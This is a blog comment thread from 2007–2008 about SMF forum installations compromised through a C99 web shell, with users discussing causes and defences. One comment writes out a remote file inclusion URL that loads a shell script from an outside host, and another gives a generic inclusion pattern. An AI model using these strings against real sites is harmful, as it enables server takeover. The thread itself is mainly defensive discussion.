Comments on: All Your SMF Forums Have Been Hacked. Have a Nice Day.

By: Purepker

Purepker — Tue, 22 Jul 2008 01:08:59 +0000

So what do we do, delete the forums?? IS this serious like getting your info like credit card number, address of your house and stuff?? please let me know sap.

Thanks

By: John

John — Wed, 07 May 2008 07:46:00 +0000

Retarded script-kiddies are trying this on old versions of SMF…

thedomain.com/index.php?action=http_full_url_to_txt_with_php_inside

By: Codenaur

Codenaur — Mon, 28 Apr 2008 08:43:45 +0000

A few things I would like to clear up, The shell is encoded with bace64 to get round mod_security. Now I know this is a OLD blog post, but I think he exploited a remote file inclusion exploit in the themes directory(thats why he opened the readme). The exploit is;

/Sources/Themes.php?settings[theme_dir]=http://bilmemne.siz/c99.txt?

Now theres not official patch for this yet, But the exploit should be unable to work if you have register_globles enabled.

By: daisy

daisy — Fri, 11 Apr 2008 12:57:43 +0000

the C99madShell is a common exploit script used against any system which allows attachments or uploads, make sure that you do not allow uploads with php* extensions to any of your systems or you leave yourself open to this attack which can be used to root your server or to make your server attack other servers

By: Daw Hosting Blog

Daw Hosting Blog — Fri, 04 Apr 2008 16:34:37 +0000

Hey,

I have red the aricle very, very carefully because I’ thinking of having SMF installed as a forum on one of my accounts. Do you think that it is not safer than any other Open Source freeware forum software?

By: haha

haha — Sun, 27 Jan 2008 22:05:28 +0000

“cleaver”? you mean “clever”.

FFS, get a dictionary.

By: kcho

kcho — Sat, 24 Nov 2007 10:18:23 +0000

i have something like a year using SMF and the real problem what i find in it is what some mods makes the code crash sometimes, but in origin is a good forum, simple machines team make their best to give us a free solution.

By: Fotis Evangelou

Fotis Evangelou — Thu, 25 Oct 2007 15:58:45 +0000

We had the same issue as well.

The suspicious readme.php file was on the root path of SMF, not the themes folder. So I guess it’s not related to themes.

We’ve added the php security controls you mentioned and now we wait.

Thanks for your insights man. ;)

By: poncheg

poncheg — Wed, 17 Oct 2007 19:19:47 +0000

i say stupid ADMIN :)

By: Motoko-chan

Motoko-chan — Tue, 02 Oct 2007 20:39:06 +0000

Every software has had security issues. If they haven’t it is just because it hasn’t happened yet.

Anyway, this particular issue appears to be related to a bug that was fixed in the latest 1.0 and 1.1 releases.